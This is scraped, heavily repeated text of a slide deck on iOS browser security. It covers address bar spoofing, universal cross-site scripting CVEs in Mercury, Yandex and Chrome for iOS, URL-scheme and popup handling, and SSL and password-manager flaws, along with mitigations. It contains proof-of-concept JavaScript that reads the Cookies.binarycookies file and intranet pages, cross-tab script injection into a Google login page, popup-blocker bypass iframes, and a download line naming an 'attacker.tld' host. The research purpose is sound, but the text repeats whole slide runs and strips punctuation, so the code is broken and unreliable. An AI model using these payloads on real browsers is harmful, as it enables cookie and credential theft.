CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 35: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/35.jpg)
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 36: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/36.jpg)
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 37: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/37.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
